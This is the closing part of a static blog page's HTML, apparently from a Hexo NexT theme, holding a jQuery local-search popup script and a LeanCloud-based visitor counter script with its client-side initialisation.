  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("KvkboNezCqOpWaIBvOMgJE3K-gzGzoHsz", "slQuYxW7tjbda9dyxmi3dY4o");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  
  

  

  

  

</body>
</html>
